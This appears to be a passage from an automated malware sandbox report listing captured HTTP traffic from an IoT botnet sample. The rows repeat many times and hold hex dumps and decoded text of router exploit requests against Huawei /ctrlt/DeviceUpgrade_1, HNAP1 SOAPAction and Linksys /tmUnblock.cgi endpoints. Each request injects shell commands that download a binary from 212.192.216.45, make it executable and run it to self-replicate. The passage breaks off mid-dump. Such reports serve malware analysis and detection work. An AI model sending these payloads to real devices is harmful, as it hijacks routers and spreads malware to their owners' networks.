61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 